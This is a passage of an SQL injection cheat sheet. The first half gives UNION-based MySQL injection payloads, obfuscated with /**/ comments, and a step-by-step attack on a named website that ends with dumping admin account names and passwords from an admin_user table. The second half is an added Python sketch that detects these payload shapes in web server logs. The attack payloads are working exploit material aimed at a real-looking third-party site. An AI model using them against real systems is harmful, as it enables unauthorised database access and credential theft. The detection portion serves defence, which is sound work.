Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<database name as hex>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<table name as hex>/**/limit/**/1,1

MySQL5 advanced injection method: dumping tables

Example:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hexadecimal encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the fourth one.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
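
Seen from the defender's side, the requests above share three traits that survive in web server logs: `/**/` comments standing in for spaces, a UNION SELECT against an `information_schema` view, and hex-encoded schema or table names. The following detection sketch is an added example, not part of the original post; the function names, the `/item.php` and `/search.php` paths, and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Patterns derived from the payload shapes shown on this page.
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
METADATA = re.compile(
    r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)  # hex-encoded names


def normalize(request):
    """URL-decode, turn inline comments into spaces, collapse whitespace."""
    text = INLINE_COMMENT.sub(" ", unquote_plus(request))
    return re.sub(r"\s+", " ", text).strip()


def inspect(request):
    """Return a finding dict for a suspicious request line, or None."""
    text = normalize(request)
    if not UNION_SELECT.search(text):
        return None
    meta = METADATA.search(text)
    decoded = [bytes.fromhex(h).decode("utf-8", "replace")
               for h in HEX_LITERAL.findall(text)]
    # "union select" can occur in ordinary text; require a second signal.
    if not meta and not decoded:
        return None
    return {"metadata_view": meta.group(1).upper() if meta else None,
            "hex_decoded": decoded,  # what the request was asking about
            "normalized": text}


# Constructed request lines (not real log data); paths are placeholders.
SAMPLE_REQUESTS = [
    "/item.php?id=13",
    "/item.php?id=13/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5"
    "/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA="
    "0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "/item.php?id=13%2F**%2Funion%2F**%2Fselect%2F**%2F1,2,3,COLUMN_NAME,5"
    "%2F**%2Ffrom%2F**%2Finformation_schema.COLUMNS%2F**%2Fwhere%2F**%2F"
    "TABLE_NAME=0x61646D696E5F75736572",
    "/search.php?q=student+union+select+committee",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        finding = inspect(line)
        print("ALERT" if finding else "ok   ", finding or line)
```

Decoding the hex literals in an alert shows which schema and table the request enumerated, which helps scope what data to treat as exposed during incident response.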